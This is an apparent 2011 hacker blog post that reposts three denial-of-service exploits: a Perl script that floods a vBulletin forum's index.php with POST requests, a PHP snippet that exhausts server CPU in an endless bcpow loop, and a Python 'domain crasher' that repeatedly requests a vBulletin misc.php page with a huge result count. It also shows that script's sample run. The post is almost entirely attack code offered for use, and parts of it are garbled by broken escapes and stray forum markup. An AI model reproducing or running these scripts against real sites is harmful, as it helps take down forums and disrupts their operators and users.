Tuesday, January 11, 2011

DDOS Exploit for Vbullitin , PHP ,

8:49 PM Blackmygo

Just a few exploits from Inj3ct0r

Vbullitin DoS
# VBulletin 0-day denial of service II


#
#Perl Script
use Socket;
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http://)//eg;
for ($i=0; $i<10; $i++)
{
$user="vbulletin".$rand.$i;
$data = "s=&";
;
$len = length $data;
$foo = "POST ".$dir."index.php HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
     my $port = "80";
     my $proto = getprotobyname('tcp');

     socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
     connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
     send(SOCKET,"$foo", 0);
     syswrite STDOUT, "Fire";
}
print "nn";
system('ping $host');
sub usage {
print "tusage: n";
print "t$0  n";
print "tex: $0 127.0.0.1 /forum/n";
print "tex2: $0 127.0.0.1 / (if there isn't a dir)nn";
exit();
};
 
###############################################
# Created by SeeMe
# Greetz to In3ct0r.com Team

PHP DoS
]
$junk=str_repeat("99999999999999999999999999999999999999999999999999",99999);
for($i=0;$i<2;){
$buff=bcpow($junk, '3', 2);
$buff=null;
}
//Coded By Pejvak;
?>

Vbullitin DoS 2

[color="#00FF00"][b]import urllib,urllib2,re
[code]print "####################################"
print "#[+]ICW 0-day Domain Crasher #"
print "#[+] Exploit found by Yash [ICW] #"
print "#[+] Exploit Coded by FB1H2S [ICW] #"
print "#[+] Care-Taker d4rk-blu [ICW] #"
print "#[+] Indian Cyber Warriors #"
print "####################################\n"
print "Enter Domain Adress:"
domain=raw_input("[+]Ex: www.site.com:")
url ='http://'+domain+'/misc.php?show=latestposts&vsacb_resnr=10000000'
res = urllib.urlopen(url).read(200)
phpmem= re.findall('of (.*?)bytes.*?',res)
bytes=int(phpmem[0])
mb=bytes/1048576
print '[+]Server php memmory is:'+str(mb)+' MB'
print "[+]Enter the No of request you wann send:"
kill=raw_input("Some 20-30 will be enough:")
try:
for i in range(1,int(kill)):
print i
res1 = urllib.urlopen(url).read(200)
print res1
except(IOError),msg: print "Server will be FCUK'ed by now"
################################################################
C:\Python25>python vbexploit.py
####################################
#[+]ICW 0-day Domain Crasher #
#[+] Bug found by Yash [ICW] #
#[+] Exploit Coded by FB1H2S [ICW] #
#[+] Care-Taker d4rk-blu [ICW] #
#[+] Indian Cyber Warriors #
####################################
 
Enter Domain Adress:
[+]Ex: www.site.com: sitehere
 
[+]Server php memmory is:32 MB
[+]Enter the No of request you wann send:20
1
2
3
Server will be FCUK'ed by now

0 comments:

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Radio Online